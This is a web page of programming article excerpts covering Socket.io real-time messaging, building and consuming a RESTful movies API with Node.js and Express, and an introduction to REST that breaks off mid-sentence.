HttpExecutionContext.fromThread(myExecutionContext));} Does this feels like clumsy code? Buy the book to learn how to reduce the boilerplate! Summary This article detailed a lot of things on the internals of the framework. You now know that Play uses an evented execution model to process requests and serve responses and that it implies that your code should not block the execution thread. You know how to use future blocks and promises to define computation fragments that can be concurrently managed by Play's execution context and how to define your own execution context with a different threading policy, for example, if you are constrained to use a blocking API. Resources for Article: Further resources on this subject: Play! Framework 2 – Dealing with Content [article] So, what is Play? [article] Play Framework: Introduction to Writing Modules [article]
Read more
  • 0
  • 0
  • 4322

article-image-adding-real-time-functionality-using-socketio
Packt
22 Sep 2014
18 min read
Save for later

Adding Real-time Functionality Using Socket.io

Packt
22 Sep 2014
18 min read
In this article by Amos Q. Haviv, the author of MEAN Web Development, decribes how Socket.io enables Node.js developers to support real-time communication using WebSockets in modern browsers and legacy fallback protocols in older browsers. (For more resources related to this topic, see here.) Introducing WebSockets Modern web applications such as Facebook, Twitter, or Gmail are incorporating real-time capabilities, which enable the application to continuously present the user with recently updated information. Unlike traditional applications, in real-time applications the common roles of browser and server can be reversed since the server needs to update the browser with new data, regardless of the browser request state. This means that unlike the common HTTP behavior, the server won't wait for the browser's requests. Instead, it will send new data to the browser whenever this data becomes available. This reverse approach is often called Comet, a term coined by a web developer named Alex Russel back in 2006 (the term was a word play on the AJAX term; both Comet and AJAX are common household cleaners in the US). In the past, there were several ways to implement a Comet functionality using the HTTP protocol. The first and easiest way is XHR polling. In XHR polling, the browser makes periodic requests to the server. The server then returns an empty response unless it has new data to send back. Upon a new event, the server will return the new event data to the next polling request. While this works quite well for most browsers, this method has two problems. The most obvious one is that using this method generates a large number of requests that hit the server with no particular reason, since a lot of requests are returning empty. The second problem is that the update time depends on the request period. This means that new data will only get pushed to the browser on the next request, causing delays in updating the client state. To solve these issues, a better approach was introduced: XHR long polling. In XHR long polling, the browser makes an XHR request to the server, but a response is not sent back unless the server has a new data. Upon an event, the server responds with the event data and the browser makes a new long polling request. This cycle enables a better management of requests, since there is only a single request per session. Furthermore, the server can update the browser immediately with new information, without having to wait for the browser's next request. Because of its stability and usability, XHR long polling has become the standard approach for real-time applications and was implemented in various ways, including Forever iFrame, multipart XHR, JSONP long polling using script tags (for cross-domain, real-time support), and the common long-living XHR. However, all these approaches were actually hacks using the HTTP and XHR protocols in a way they were not meant to be used. With the rapid development of modern browsers and the increased adoption of the new HTML5 specifications, a new protocol emerged for implementing real-time communication: the full duplex WebSockets. In browsers that support the WebSockets protocol, the initial connection between the server and browser is made over HTTP and is called an HTTP handshake. Once the initial connection is made, the browser and server open a single ongoing communication channel over a TCP socket. Once the socket connection is established, it enables bidirectional communication between the browser and server. This enables both parties to send and retrieve messages over a single communication channel. This also helps to lower server load, decrease message latency, and unify PUSH communication using a standalone connection. However, WebSockets still suffer from two major problems. First and foremost is browser compatibility. The WebSockets specification is fairly new, so older browsers don't support it, and though most modern browsers now implement the protocol, a large group of users are still using these older browsers. The second problem is HTTP proxies, firewalls, and hosting providers. Since WebSockets use a different communication protocol than HTTP, a lot of these intermediaries don't support it yet and block any socket communication. As it has always been with the Web, developers are left with a fragmentation problem, which can only be solved using an abstraction library that optimizes usability by switching between protocols according to the available resources. Fortunately, a popular library called Socket.io was already developed for this purpose, and it is freely available for the Node.js developer community. Introducing Socket.io Created in 2010 by JavaScript developer, Guillermo Rauch, Socket.io aimed to abstract Node.js' real-time application development. Since then, it has evolved dramatically, released in nine major versions before being broken in its latest version into two different modules: Engine.io and Socket.io. Previous versions of Socket.io were criticized for being unstable, since they first tried to establish the most advanced connection mechanisms and then fallback to more primitive protocols. This caused serious issues with using Socket.io in production environments and posed a threat to the adoption of Socket.io as a real-time library. To solve this, the Socket.io team redesigned it and wrapped the core functionality in a base module called Engine.io. The idea behind Engine.io was to create a more stable real-time module, which first opens a long-polling XHR communication and then tries to upgrade the connection to a WebSockets channel. The new version of Socket.io uses the Engine.io module and provides the developer with various features such as events, rooms, and automatic connection recovery, which you would otherwise implement by yourself. In this article's examples, we will use the new Socket.io 1.0, which is the first version to use the Engine.io module. Older versions of Socket.io prior to Version 1.0 are not using the new Engine.io module and therefore are much less stable in production environments. When you include the Socket.io module, it provides you with two objects: a socket server object that is responsible for the server functionality and a socket client object that handles the browser's functionality. We'll begin by examining the server object. The Socket.io server object The Socket.io server object is where it all begins. You start by requiring the Socket.io module, and then use it to create a new Socket.io server instance that will interact with socket clients. The server object supports both a standalone implementation and the ability to use it in conjunction with the Express framework. The server instance then exposes a set of methods that allow you to manage the Socket.io server operations. Once the server object is initialized, it will also be responsible for serving the socket client JavaScript file for the browser. A simple implementation of the standalone Socket.io server will look as follows: var io = require('socket.io')();io.on('connection', function(socket){ /* ... */ });io.listen(3000); This will open a Socket.io over the 3000 port and serve the socket client file at the URL http://localhost:3000/socket.io/socket.io.js. Implementing the Socket.io server in conjunction with an Express application will be a bit different: var app = require('express')();var server = require('http').Server(app);var io = require('socket.io')(server);io.on('connection', function(socket){ /* ... */ });server.listen(3000); This time, you first use the http module of Node.js to create a server and wrap the Express application. The server object is then passed to the Socket.io module and serves both the Express application and the Socket.io server. Once the server is running, it will be available for socket clients to connect. A client trying to establish a connection with the Socket.io server will start by initiating the handshaking process. Socket.io handshaking When a client wants to connect the Socket.io server, it will first send a handshake HTTP request. The server will then analyze the request to gather the necessary information for ongoing communication. It will then look for configuration middleware that is registered with the server and execute it before firing the connection event. When the client is successfully connected to the server, the connection event listener is executed, exposing a new socket instance. Once the handshaking process is over, the client is connected to the server and all communication with it is handled through the socket instance object. For example, handling a client's disconnection event will be as follows: var app = require('express')();var server = require('http').Server(app);var io = require('socket.io')(server);io.on('connection', function(socket){socket.on('disconnect', function() {   console.log('user has disconnected');});});server.listen(3000); Notice how the socket.on() method adds an event handler to the disconnection event. Although the disconnection event is a predefined event, this approach works the same for custom events as well, as you will see in the following sections. While the handshake mechanism is fully automatic, Socket.io does provide you with a way to intercept the handshake process using a configuration middleware. The Socket.io configuration middleware Although the Socket.io configuration middleware existed in previous versions, in the new version it is even simpler and allows you to manipulate socket communication before the handshake actually occurs. To create a configuration middleware, you will need to use the server's use() method, which is very similar to the Express application's use() method: var app = require('express')();var server = require('http').Server(app);var io = require('socket.io')(server);io.use(function(socket, next) {/* ... */next(null, true);});io.on('connection', function(socket){socket.on('disconnect', function() {   console.log('user has disconnected');});});server.listen(3000); As you can see, the io.use() method callback accepts two arguments: the socket object and a next callback. The socket object is the same socket object that will be used for the connection and it holds some connection properties. One important property is the socket.request property, which represents the handshake HTTP request. In the following sections, you will use the handshake request to incorporate the Passport session with the Socket.io connection. The next argument is a callback method that accepts two arguments: an error object and Boolean value. The next callback tells Socket.io whether or not to proceed with the handshake process, so if you pass an error object or a false value to the next method, Socket.io will not initiate the socket connection. Now that you have a basic understanding of how handshaking works, it is time to discuss the Socket.io client object. The Socket.io client object The Socket.io client object is responsible for the implementation of the browser socket communication with the Socket.io server. You start by including the Socket.io client JavaScript file, which is served by the Socket.io server. The Socket.io JavaScript file exposes an io() method that connects to the Socket.io server and creates the client socket object. A simple implementation of the socket client will be as follows: <script src="/socket.io/socket.io.js"></script><script>var socket = io();socket.on('connect', function() {   /* ... */});</script> Notice the default URL for the Socket.io client object. Although this can be altered, you can usually leave it like this and just include the file from the default Socket.io path. Another thing you should notice is that the io() method will automatically try to connect to the default base path when executed with no arguments; however, you can also pass a different server URL as an argument. As you can see, the socket client is much easier to implement, so we can move on to discuss how Socket.io handles real-time communication using events. Socket.io events To handle the communication between the client and the server, Socket.io uses a structure that mimics the WebSockets protocol and fires events messages across the server and client objects. There are two types of events: system events, which indicate the socket connection status, and custom events, which you'll use to implement your business logic. The system events on the socket server are as follows: io.on('connection', ...): This is emitted when a new socket is connected socket.on('message', ...): This is emitted when a message is sent using the socket.send() method socket.on('disconnect', ...): This is emitted when the socket is disconnected The system events on the client are as follows: socket.io.on('open', ...): This is emitted when the socket client opens a connection with the server socket.io.on('connect', ...): This is emitted when the socket client is connected to the server socket.io.on('connect_timeout', ...): This is emitted when the socket client connection with the server is timed out socket.io.on('connect_error', ...): This is emitted when the socket client fails to connect with the server socket.io.on('reconnect_attempt', ...): This is emitted when the socket client tries to reconnect with the server socket.io.on('reconnect', ...): This is emitted when the socket client is reconnected to the server socket.io.on('reconnect_error', ...): This is emitted when the socket client fails to reconnect with the server socket.io.on('reconnect_failed', ...): This is emitted when the socket client fails to reconnect with the server socket.io.on('close', ...): This is emitted when the socket client closes the connection with the server Handling events While system events are helping us with connection management, the real magic of Socket.io relies on using custom events. In order to do so, Socket.io exposes two methods, both on the client and server objects. The first method is the on() method, which binds event handlers with events and the second method is the emit() method, which is used to fire events between the server and client objects. An implementation of the on() method on the socket server is very simple: var app = require('express')();var server = require('http').Server(app);var io = require('socket.io')(server);io.on('connection', function(socket){socket.on('customEvent', function(customEventData) {   /* ... */});});server.listen(3000); In the preceding code, you bound an event listener to the customEvent event. The event handler is being called when the socket client object emits the customEvent event. Notice how the event handler accepts the customEventData argument that is passed to the event handler from the socket client object. An implementation of the on() method on the socket client is also straightforward: <script src="/socket.io/socket.io.js"></script><script>var socket = io();socket.on('customEvent', function(customEventData) {   /* ... */});</script> This time the event handler is being called when the socket server emits the customEvent event that sends customEventData to the socket client event handler. Once you set your event handlers, you can use the emit() method to send events from the socket server to the socket client and vice versa. Emitting events On the socket server, the emit() method is used to send events to a single socket client or a group of connected socket clients. The emit() method can be called from the connected socket object, which will send the event to a single socket client, as follows: io.on('connection', function(socket){socket.emit('customEvent', customEventData);}); The emit() method can also be called from the io object, which will send the event to all connected socket clients, as follows: io.on('connection', function(socket){io.emit('customEvent', customEventData);}); Another option is to send the event to all connected socket clients except from the sender using the broadcast property, as shown in the following lines of code: io.on('connection', function(socket){socket.broadcast.emit('customEvent', customEventData);}); On the socket client, things are much simpler. Since the socket client is only connected to the socket server, the emit() method will only send the event to the socket server: var socket = io();socket.emit('customEvent', customEventData); Although these methods allow you to switch between personal and global events, they still lack the ability to send events to a group of connected socket clients. Socket.io offers two options to group sockets together: namespaces and rooms. Socket.io namespaces In order to easily control socket management, Socket.io allow developers to split socket connections according to their purpose using namespaces. So instead of creating different socket servers for different connections, you can just use the same server to create different connection endpoints. This means that socket communication can be divided into groups, which will then be handled separately. Socket.io server namespaces To create a socket server namespace, you will need to use the socket server of() method that returns a socket namespace. Once you retain the socket namespace, you can just use it the same way you use the socket server object: var app = require('express')();var server = require('http').Server(app);var io = require('socket.io')(server);io.of('/someNamespace').on('connection', function(socket){socket.on('customEvent', function(customEventData) {   /* ... */});});io.of('/someOtherNamespace').on('connection', function(socket){socket.on('customEvent', function(customEventData) {   /* ... */});});server.listen(3000); In fact, when you use the io object, Socket.io actually uses a default empty namespace as follows: io.on('connection', function(socket){/* ... */}); The preceding lines of code are actually equivalent to this: io.of('').on('connection', function(socket){/* ... */}); Socket.io client namespaces On the socket client, the implementation is a little different: <script src="/socket.io/socket.io.js"></script><script>var someSocket = io('/someNamespace');someSocket.on('customEvent', function(customEventData) {   /* ... */});var someOtherSocket = io('/someOtherNamespace');someOtherSocket.on('customEvent', function(customEventData) {   /* ... */});</script> As you can see, you can use multiple namespaces on the same application without much effort. However, once sockets are connected to different namespaces, you will not be able to send an event to all these namespaces at once. This means that namespaces are not very good for a more dynamic grouping logic. For this purpose, Socket.io offers a different feature called rooms. Socket.io rooms Socket.io rooms allow you to partition connected sockets into different groups in a dynamic way. Connected sockets can join and leave rooms, and Socket.io provides you with a clean interface to manage rooms and emit events to the subset of sockets in a room. The rooms functionality is handled solely on the socket server but can easily be exposed to the socket client. Joining and leaving rooms Joining a room is handled using the socket join() method, while leaving a room is handled using the leave() method. So, a simple subscription mechanism can be implemented as follows: io.on('connection', function(socket) {   socket.on('join', function(roomData) {       socket.join(roomData.roomName);   })   socket.on('leave', function(roomData) {       socket.leave(roomData.roomName);   })}); Notice that the join() and leave() methods both take the room name as the first argument. Emitting events to rooms To emit events to all the sockets in a room, you will need to use the in() method. So, emitting an event to all socket clients who joined a room is quite simple and can be achieved with the help of the following code snippets: io.on('connection', function(socket){   io.in('someRoom').emit('customEvent', customEventData);}); Another option is to send the event to all connected socket clients in a room except the sender by using the broadcast property and the to() method: io.on('connection', function(socket){   socket.broadcast.to('someRoom').emit('customEvent', customEventData);}); This pretty much covers the simple yet powerful room functionality of Socket.io. In the next section, you will learn how implement Socket.io in your MEAN application, and more importantly, how to use the Passport session to identify users in the Socket.io session. While we covered most of Socket.io features, you can learn more about Socket.io by visiting the official project page at https://socket.io. Summary In this article, you learned how the Socket.io module works. You went over the key features of Socket.io and learned how the server and client communicate. You configured your Socket.io server and learned how to integrate it with your Express application. You also used the Socket.io handshake configuration to integrate the Passport session. In the end, you built a fully functional chat example and learned how to wrap the Socket.io client with an AngularJS service. Resources for Article: Further resources on this subject: Creating a RESTful API [article] Angular Zen [article] Digging into the Architecture [article]
Read more
  • 0
  • 0
  • 9396

article-image-creating-restful-api
Packt
19 Sep 2014
24 min read
Save for later

Creating a RESTful API

Packt
19 Sep 2014
24 min read
In this article by Jason Krol, the author of Web Development with MongoDB and NodeJS, we will review the following topics: (For more resources related to this topic, see here.) Introducing RESTful APIs Installing a few basic tools Creating a basic API server and sample JSON data Responding to GET requests Updating data with POST and PUT Removing data with DELETE Consuming external APIs from Node What is an API? An Application Programming Interface (API) is a set of tools that a computer system makes available that provides unrelated systems or software the ability to interact with each other. Typically, a developer uses an API when writing software that will interact with a closed, external, software system. The external software system provides an API as a standard set of tools that all developers can use. Many popular social networking sites provide developer's access to APIs to build tools to support those sites. The most obvious examples are Facebook and Twitter. Both have a robust API that provides developers with the ability to build plugins and work with data directly, without them being granted full access as a general security precaution. As you will see with this article, providing your own API is not only fairly simple, but also it empowers you to provide your users with access to your data. You also have the added peace of mind knowing that you are in complete control over what level of access you can grant, what sets of data you can make read-only, as well as what data can be inserted and updated. What is a RESTful API? Representational State Transfer (REST) is a fancy way of saying CRUD over HTTP. What this means is when you use a REST API, you have a uniform means to create, read, and update data using simple HTTP URLs with a standard set of HTTP verbs. The most basic form of a REST API will accept one of the HTTP verbs at a URL and return some kind of data as a response. Typically, a REST API GET request will always return some kind of data such as JSON, XML, HTML, or plain text. A POST or PUT request to a RESTful API URL will accept data to create or update. The URL for a RESTful API is known as an endpoint, and while working with these endpoints, it is typically said that you are consuming them. The standard HTTP verbs used while interfacing with REST APIs include: GET: This retrieves data POST: This submits data for a new record PUT: This submits data to update an existing record PATCH: This submits a date to update only specific parts of an existing record DELETE: This deletes a specific record Typically, RESTful API endpoints are defined in a way that they mimic the data models and have semantic URLs that are somewhat representative of the data models. What this means is that to request a list of models, for example, you would access an API endpoint of /models. Likewise, to retrieve a specific model by its ID, you would include that in the endpoint URL via /models/:Id. Some sample RESTful API endpoint URLs are as follows: GET http://myapi.com/v1/accounts: This returns a list of accounts GET http://myapi.com/v1/accounts/1: This returns a single account by Id: 1 POST http://myapi.com/v1/accounts: This creates a new account (data submitted as a part of the request) PUT http://myapi.com/v1/accounts/1: This updates an existing account by Id: 1 (data submitted as part of the request) GET http://myapi.com/v1/accounts/1/orders: This returns a list of orders for account Id: 1 GET http://myapi.com/v1/accounts/1/orders/21345: This returns the details for a single order by Order Id: 21345 for account Id: 1 It's not a requirement that the URL endpoints match this pattern; it's just common convention. Introducing Postman REST Client Before we get started, there are a few tools that will make life much easier when you're working directly with APIs. The first of these tools is called Postman REST Client, and it's a Google Chrome application that can run right in your browser or as a standalone-packaged application. Using this tool, you can easily make any kind of request to any endpoint you want. The tool provides many useful and powerful features that are very easy to use and, best of all, free! Installation instructions Postman REST Client can be installed in two different ways, but both require Google Chrome to be installed and running on your system. The easiest way to install the application is by visiting the Chrome Web Store at https://chrome.google.com/webstore/category/apps. Perform a search for Postman REST Client and multiple results will be returned. There is the regular Postman REST Client that runs as an application built into your browser, and then separate Postman REST Client (packaged app) that runs as a standalone application on your system in its own dedicated window. Go ahead and install your preference. If you install the application as the standalone packaged app, an icon to launch it will be added to your dock or taskbar. If you installed it as a regular browser app, you can launch it by opening a new tab in Google Chrome and going to Apps and finding the Postman REST Client icon. After you've installed and launched the app, you should be presented with an output similar to the following screenshot: A quick tour of Postman REST Client Using Postman REST Client, we're able to submit REST API calls to any endpoint we want as well as modify the type of request. Then, we can have complete access to the data that's returned from the API as well as any errors that might have occurred. To test an API call, enter the URL to your favorite website in the Enter request URL here field and leave the dropdown next to it as GET. This will mimic a standard GET request that your browser performs anytime you visit a website. Click on the blue Send button. The request is made and the response is displayed at the bottom half of the screen. In the following screenshot, I sent a simple GET request to http://kroltech.com and the HTML is returned as follows: If we change this URL to that of the RSS feed URL for my website, you can see the XML returned: The XML view has a few more features as it exposes the sidebar to the right that gives you a handy outline to glimpse the tree structure of the XML data. Not only that, you can now see a history of the requests we've made so far along the left sidebar. This is great when we're doing more advanced POST or PUT requests and don't want to repeat the data setup for each request while testing an endpoint. Here is a sample API endpoint I submitted a GET request to that returns the JSON data in its response: A really nice thing about making API calls to endpoints that return JSON using Postman Client is that it parses and displays the JSON in a very nicely formatted way, and each node in the data is expandable and collapsible. The app is very intuitive so make sure you spend some time playing around and experimenting with different types of calls to different URLs. Using the JSONView Chrome extension There is one other tool I want to let you know about (while extremely minor) that is actually a really big deal. The JSONView Chrome extension is a very small plugin that will instantly convert any JSON you view directly via the browser into a more usable JSON tree (exactly like Postman Client). Here is an example of pointing to a URL that returns JSON from Chrome before JSONView is installed: And here is that same URL after JSONView has been installed: You should install the JSONView Google Chrome extension the same way you installed Postman REST Client—access the Chrome Web Store and perform a search for JSONView. Now that you have the tools to be able to easily work with and test API endpoints, let's take a look at writing your own and handling the different request types. Creating a Basic API server Let's create a super basic Node.js server using Express that we'll use to create our own API. Then, we can send tests to the API using Postman REST Client to see how it all works. In a new project workspace, first install the npm modules that we're going to need in order to get our server up and running: $ npm init $ npm install --save express body-parser underscore Now that the package.json file for this project has been initialized and the modules installed, let's create a basic server file to bootstrap up an Express server. Create a file named server.js and insert the following block of code: var express = require('express'),    bodyParser = require('body-parser'),    _ = require('underscore'), json = require('./movies.json'),    app = express();   app.set('port', process.env.PORT || 3500);   app.use(bodyParser.urlencoded()); app.use(bodyParser.json());   var router = new express.Router(); // TO DO: Setup endpoints ... app.use('/', router);   var server = app.listen(app.get('port'), function() {    console.log('Server up: http://localhost:' + app.get('port')); }); Most of this should look familiar to you. In the server.js file, we are requiring the express, body-parser, and underscore modules. We're also requiring a file named movies.json, which we'll create next. After our modules are required, we set up the standard configuration for an Express server with the minimum amount of configuration needed to support an API server. Notice that we didn't set up Handlebars as a view-rendering engine because we aren't going to be rendering any HTML with this server, just pure JSON responses. Creating sample JSON data Let's create the sample movies.json file that will act as our temporary data store (even though the API we build for the purposes of demonstration won't actually persist data beyond the app's life cycle): [{    "Id": "1",    "Title": "Aliens",    "Director": "James Cameron",    "Year": "1986",    "Rating": "8.5" }, {    "Id": "2",    "Title": "Big Trouble in Little China",    "Director": "John Carpenter",    "Year": "1986",    "Rating": "7.3" }, {    "Id": "3",    "Title": "Killer Klowns from Outer Space",    "Director": "Stephen Chiodo",    "Year": "1988",    "Rating": "6.0" }, {    "Id": "4",    "Title": "Heat",    "Director": "Michael Mann",    "Year": "1995",    "Rating": "8.3" }, {    "Id": "5",    "Title": "The Raid: Redemption",    "Director": "Gareth Evans",    "Year": "2011",    "Rating": "7.6" }] This is just a really simple JSON list of a few of my favorite movies. Feel free to populate it with whatever you like. Boot up the server to make sure you aren't getting any errors (note we haven't set up any routes yet, so it won't actually do anything if you tried to load it via a browser): $ node server.js Server up: http://localhost:3500 Responding to GET requests Adding a simple GET request support is fairly simple, and you've seen this before already in the app we built. Here is some sample code that responds to a GET request and returns a simple JavaScript object as JSON. Insert the following code in the routes section where we have the // TO DO: Setup endpoints ... waiting comment: router.get('/test', function(req, res) {    var data = {        name: 'Jason Krol',        website: 'http://kroltech.com'    };      res.json(data); }); Let's tweak the function a little bit and change it so that it responds to a GET request against the root URL (that is /) route and returns the JSON data from our movies file. Add this new route after the /test route added previously: router.get('/', function(req, res) {    res.json(json); }); The res (response) object in Express has a few different methods to send data back to the browser. Each of these ultimately falls back on the base send method, which includes header information, statusCodes, and so on. res.json and res.jsonp will automatically format JavaScript objects into JSON and then send using res.send. res.render will render a template view as a string and then send it using res.send as well. With that code in place, if we launch the server.js file, the server will be listening for a GET request to the / URL route and will respond with the JSON data of our movies collection. Let's first test it out using the Postman REST Client tool: GET requests are nice because we could have just as easily pulled that same URL via our browser and received the same result: However, we're going to use Postman for the remainder of our endpoint testing as it's a little more difficult to send POST and PUT requests using a browser. Receiving data – POST and PUT requests When we want to allow our users using our API to insert or update data, we need to accept a request from a different HTTP verb. When inserting new data, the POST verb is the preferred method to accept data and know it's for an insert. Let's take a look at code that accepts a POST request and data along with the request, and inserts a record into our collection and returns the updated JSON. Insert the following block of code after the route you added previously for GET: router.post('/', function(req, res) {    // insert the new item into the collection (validate first)    if(req.body.Id && req.body.Title && req.body.Director && req.body.Year && req.body.Rating) {        json.push(req.body);        res.json(json);    } else {        res.json(500, { error: 'There was an error!' });    } }); You can see the first thing we do in the POST function is check to make sure the required fields were submitted along with the actual request. Assuming our data checks out and all the required fields are accounted for (in our case every field), we insert the entire req.body object into the array as is using the array's push function. If any of the required fields aren't submitted with the request, we return a 500 error message instead. Let's submit a POST request this time to the same endpoint using the Postman REST Client. (Don't forget to make sure your API server is running with node server.js.): First, we submitted a POST request with no data, so you can clearly see the 500 error response that was returned. Next, we provided the actual data using the x-www-form-urlencoded option in Postman and provided each of the name/value pairs with some new custom data. You can see from the results that the STATUS was 200, which is a success and the updated JSON data was returned as a result. Reloading the main GET endpoint in a browser yields our original movies collection with the new one added. PUT requests will work in almost exactly the same way except traditionally, the Id property of the data is handled a little differently. In our example, we are going to require the Id attribute as a part of the URL and not accept it as a parameter in the data that's submitted (since it's usually not common for an update function to change the actual Id of the object it's updating). Insert the following code for the PUT route after the existing POST route you added earlier: router.put('/:id', function(req, res) {    // update the item in the collection    if(req.params.id && req.body.Title && req.body.Director && req.body.Year && req.body.Rating) {        _.each(json, function(elem, index) {             // find and update:            if (elem.Id === req.params.id) {                elem.Title = req.body.Title;                elem.Director = req.body.Director;                elem.Year = req.body.Year;                elem.Rating = req.body.Rating;            }        });          res.json(json);    } else {        res.json(500, { error: 'There was an error!' });    } }); This code again validates that the required fields are included with the data that was submitted along with the request. Then, it performs an _.each loop (using the underscore module) to look through the collection of movies and find the one whose Id parameter matches that of the Id included in the URL parameter. Assuming there's a match, the individual fields for that matched object are updated with the new values that were sent with the request. Once the loop is complete, the updated JSON data is sent back as the response. Similarly, in the POST request, if any of the required fields are missing, a simple 500 error message is returned. The following screenshot demonstrates a successful PUT request updating an existing record. The response from Postman after including the value 1 in the URL as the Id parameter, which provides the individual fields to update as x-www-form-urlencoded values, and finally sending as PUT shows that the original item in our movies collection is now the original Alien (not Aliens, its sequel as we originally had). Removing data – DELETE The final stop on our whirlwind tour of the different REST API HTTP verbs is DELETE. It should be no surprise that sending a DELETE request should do exactly what it sounds like. Let's add another route that accepts DELETE requests and will delete an item from our movies collection. Here is the code that takes care of DELETE requests that should be placed after the existing block of code from the previous PUT: router.delete('/:id', function(req, res) {    var indexToDel = -1;    _.each(json, function(elem, index) {        if (elem.Id === req.params.id) {            indexToDel = index;        }    });    if (~indexToDel) {        json.splice(indexToDel, 1);    }    res.json(json); }); This code will loop through the collection of movies and find a matching item by comparing the values of Id. If a match is found, the array index for the matched item is held until the loop is finished. Using the array.splice function, we can remove an array item at a specific index. Once the data has been updated by removing the requested item, the JSON data is returned. Notice in the following screenshot that the updated JSON that's returned is in fact no longer displaying the original second item we deleted. Note that ~ in there! That's a little bit of JavaScript black magic! The tilde (~) in JavaScript will bit flip a value. In other words, take a value and return the negative of that value incremented by one, that is ~n === -(n+1). Typically, the tilde is used with functions that return -1 as a false response. By using ~ on -1, you are converting it to a 0. If you were to perform a Boolean check on -1 in JavaScript, it would return true. You will see ~ is used primarily with the indexOf function and jQuery's $.inArray()—both return -1 as a false response. All of the endpoints defined in this article are extremely rudimentary, and most of these should never ever see the light of day in a production environment! Whenever you have an API that accepts anything other than GET requests, you need to be sure to enforce extremely strict validation and authentication rules. After all, you are basically giving your users direct access to your data. Consuming external APIs from Node.js There will undoubtedly be a time when you want to consume an API directly from within your Node.js code. Perhaps, your own API endpoint needs to first fetch data from some other unrelated third-party API before sending a response. Whatever the reason, the act of sending a request to an external API endpoint and receiving a response can be done fairly easily using a popular and well-known npm module called Request. Request was written by Mikeal Rogers and is currently the third most popular and (most relied upon) npm module after async and underscore. Request is basically a super simple HTTP client, so everything you've been doing with Postman REST Client so far is basically what Request can do, only the resulting data is available to you in your node code as well as the response status codes and/or errors, if any. Consuming an API endpoint using Request Let's do a neat trick and actually consume our own endpoint as if it was some third-party external API. First, we need to ensure we have Request installed and can include it in our app: $ npm install --save request Next, edit server.js and make sure you include Request as a required module at the start of the file: var express = require('express'),    bodyParser = require('body-parser'),    _ = require('underscore'),    json = require('./movies.json'),    app = express(),    request = require('request'); Now let's add a new endpoint after our existing routes, which will be an endpoint accessible in our server via a GET request to /external-api. This endpoint, however, will actually consume another endpoint on another server, but for the purposes of this example, that other server is actually the same server we're currently running! The Request module accepts an options object with a number of different parameters and settings, but for this particular example, we only care about a few. We're going to pass an object that has a setting for the method (GET, POST, PUT, and so on) and the URL of the endpoint we want to consume. After the request is made and a response is received, we want an inline callback function to execute. Place the following block of code after your existing list of routes in server.js: router.get('/external-api', function(req, res) {    request({            method: 'GET',            uri: 'http://localhost:' + (process.env.PORT || 3500),        }, function(error, response, body) {             if (error) { throw error; }              var movies = [];            _.each(JSON.parse(body), function(elem, index) {                movies.push({                    Title: elem.Title,                    Rating: elem.Rating                });            });            res.json(_.sortBy(movies, 'Rating').reverse());        }); }); The callback function accepts three parameters: error, response, and body. The response object is like any other response that Express handles and has all of the various parameters as such. The third parameter, body, is what we're really interested in. That will contain the actual result of the request to the endpoint that we called. In this case, it is the JSON data from our main GET route we defined earlier that returns our own list of movies. It's important to note that the data returned from the request is returned as a string. We need to use JSON.parse to convert that string to actual usable JSON data. Using the data that came back from the request, we transform it a little bit. That is, we take that data and manipulate it a bit to suit our needs. In this example, we took the master list of movies and just returned a new collection that consists of only the title and rating of each movie and then sorts the results by the top scores. Load this new endpoint by pointing your browser to http://localhost:3500/external-api, and you can see the new transformed JSON output to the screen. Let's take a look at another example that's a little more real world. Let's say that we want to display a list of similar movies for each one in our collection, but we want to look up that data somewhere such as www.imdb.com. Here is the sample code that will send a GET request to IMDB's JSON API, specifically for the word aliens, and returns a list of related movies by the title and year. Go ahead and place this block of code after the previous route for external-api: router.get('/imdb', function(req, res) {    request({            method: 'GET',            uri: 'http://sg.media-imdb.com/suggests/a/aliens.json',        }, function(err, response, body) {            var data = body.substring(body.indexOf('(')+1);            data = JSON.parse(data.substring(0,data.length-1));            var related = [];            _.each(data.d, function(movie, index) {                related.push({                    Title: movie.l,                    Year: movie.y,                    Poster: movie.i ? movie.i[0] : ''                });            });              res.json(related);        }); }); If we take a look at this new endpoint in a browser, we can see the JSON data that's returned from our /imdb endpoint is actually itself retrieving and returning data from some other API endpoint: Note that the JSON endpoint I'm using for IMDB isn't actually from their API, but rather what they use on their homepage when you type in the main search box. This would not really be the most appropriate way to use their data, but it's more of a hack to show this example. In reality, to use their API (like most other APIs), you would need to register and get an API key that you would use so that they can properly track how much data you are requesting on a daily or an hourly basis. Most APIs will to require you to use a private key with them for this same reason. Summary In this article, we took a brief look at how APIs work in general, the RESTful API approach to semantic URL paths and arguments, and created a bare bones API. We used Postman REST Client to interact with the API by consuming endpoints and testing the different types of request methods (GET, POST, PUT, and so on). You also learned how to consume an external API endpoint by using the third-party node module Request. Resources for Article: Further resources on this subject: RESTful Services JAX-RS 2.0 [Article] REST – Where It Begins [Article] RESTful Web Services – Server-Sent Events (SSE) [Article]
Read more
  • 0
  • 0
  • 5849
Packt
17 Sep 2014
12 min read
Save for later

What is REST?

Packt
17 Sep 2014
12 min read
This article by Bhakti Mehta, the author of Restful Java Patterns and Best Practices, starts with the basic concepts of REST, how to design RESTful services, and best practices around designing REST resources. It also covers the architectural aspects of REST. (For more resources related to this topic, see here.) Where REST has come from The confluence of social networking, cloud computing, and era of mobile applications creates a generation of emerging technologies that allow different networked devices to communicate with each other over the Internet. In the past, there were traditional and proprietary approaches for building solutions encompassing different devices and components communicating with each other over a non-reliable network or through the Internet. Some of these approaches such as RPC, CORBA, and SOAP-based web services, which evolved as different implementations for Service Oriented Architecture (SOA) required a tighter coupling between components along with greater complexities in integration. As the technology landscape evolves, today’s applications are built on the notion of producing and consuming APIs instead of using web frameworks that invoke services and produce web pages. This requirement enforces the need for easier exchange of information between distributed services along with predictable, robust, well-defined interfaces. API based architecture enables agile development, easier adoption and prevalence, scale and integration with applications within and outside the enterprise HTTP 1.1 is defined in RFC 2616, and is ubiquitously used as the standard protocol for distributed, collaborative and hypermedia information systems. Representational State Transfer (REST) is inspired by HTTP and can be used wherever HTTP is used. The widespread adoption of REST and JSON opens up the possibilities of applications incorporating and leveraging functionality from other applications as needed. Popularity of REST is mainly because it enables building lightweight, simple, cost-effective modular interfaces, which can be consumed by a variety of clients. This article covers the following topics Introduction to REST Safety and Idempotence HTTP verbs and REST Best practices when designing RESTful services REST architectural components Introduction to REST REST is an architectural style that conforms to the Web Standards like using HTTP verbs and URIs. It is bound by the following principles. All resources are identified by the URIs. All resources can have multiple representations All resources can be accessed/modified/created/deleted by standard HTTP methods. There is no state on the server. REST is extensible due to the use of URIs for identifying resources. For example, a URI to represent a collection of book resources could look like this: http://foo.api.com/v1/library/books A URI to represent a single book identified by its ISBN could be as 